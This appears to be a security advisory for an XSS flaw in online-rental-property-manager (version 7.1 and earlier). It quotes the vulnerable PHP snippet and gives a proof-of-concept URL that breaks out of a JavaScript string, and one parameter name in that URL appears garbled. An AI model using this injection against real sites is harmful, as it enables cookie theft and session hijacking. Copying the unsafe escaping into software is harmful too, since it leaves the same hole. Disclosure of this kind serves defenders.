vendor: online-rental-property-manager
version: <= 7.1, fix in edb404c4e31966338762de3022d0e6cfac63ca2b
An XSS vulnerability (Cross site Scripting) (CWE-79) is in app/hooks/applicants_and_tenants_filter.php
.
At line 93, The $FilterValue[1]
is inserted into javascript string represented using single quotes
and is escaped by htmlspecialchars
. However, htmlspecialchars
doesn't escape '
without
the ENT_QUOTES
flag. Therefore, an attacker can still exploit this by using '
to break out of
the javascript string and inject malicious Javascript code.
This allows attackers to obtain cookies of administrator and other users and fake their login using obtained cookies.
<script>
//for population
var filterValue_13 = '<?php echo htmlspecialchars($FilterValue[ 1 ]); ?>';
$j(function () {
if (filterValue_13) {
$j("input[class =filter_13][value ='" + filterValue_13 + "']").attr("checked", "checked");
}
})
</script>
The POC is as follows:
http://localhost/online-rental-property-manager/app/applicants_and_tenants_view.php?SearchString=&Filter_x=1¤t_view=TV&SortField=&SelectedID=&SelectedField=&SortDirection=&FirstRecord=1&NoDV=1&PrintDV=&DisplayRecords=all&FilterValue[0]=xxxx&FilterValue[1]=%27;alert(1);//&FilterField[0]=1&FilterField[1]=2